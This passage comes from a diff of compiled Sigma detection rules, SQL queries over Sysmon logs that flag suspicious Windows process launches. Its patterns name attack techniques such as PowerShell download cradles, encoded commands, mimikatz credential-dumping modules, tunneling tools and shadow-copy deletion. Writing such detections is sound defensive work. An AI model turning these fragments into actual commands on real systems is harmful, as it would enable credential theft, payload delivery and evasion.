ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_get_clipboard.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Wscript Execution from Non C Drive", + "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", + "author": "Aaron Herman", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1059" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Legitimate scripts located on other partitions such as \"D:\"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" }, { - "title": "Exfiltration and Tunneling Tools Execution", - "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", - "status": "test", - "description": "Execution of well known tools for data exfiltration and tunneling", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "status": "experimental", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", "attack.command_and_control", - "attack.t1041", - "attack.t1572", - "attack.t1071.001" + "attack.t1572" ], "falsepositives": [ - "Legitimate Administrator using tools" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\plink.exe' ESCAPE '\\' OR Image LIKE '%\\\\socat.exe' ESCAPE '\\' OR Image LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR Image LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "Suspicious aspnet_compiler.exe Execution", - "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", - "status": "test", - "description": "Execute C# code with the Build Provider and proper folder structure in place.", - "author": "frack113", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of AnyDesk from a non-standard folder" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.g0069" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "WSL Child Process Anomaly", - "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", - "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "status": "test", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "InfDefaultInstall.exe .inf Execution", - "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "title": "Writing Of Malicious Files To The Fonts Folder", + "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", "status": "test", - "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", - "author": "frack113", + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", + "author": "Sreeman", "tags": [ + "attack.t1211", + "attack.t1059", "attack.defense_evasion", - "attack.t1218" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" + "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", - "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "status": "test", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" ], "falsepositives": [ - "Legitimate use" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_frp.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "DeviceCredentialDeployment Execution", - "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "title": "File Download Using ProtocolHandler.exe", + "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "status": "experimental", - "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" + "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "title": "Suspicious Use of PsLogList", + "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psloglist.exe' OR (Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_sysinternals_psloglist.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Suspicious Execution Of PDQDeployRunner", + "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the PDQDeploy tool to execute these commands" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "title": "PUA - AdvancedRun Execution", + "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "description": "Detects the execution of AdvancedRun utility", "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE 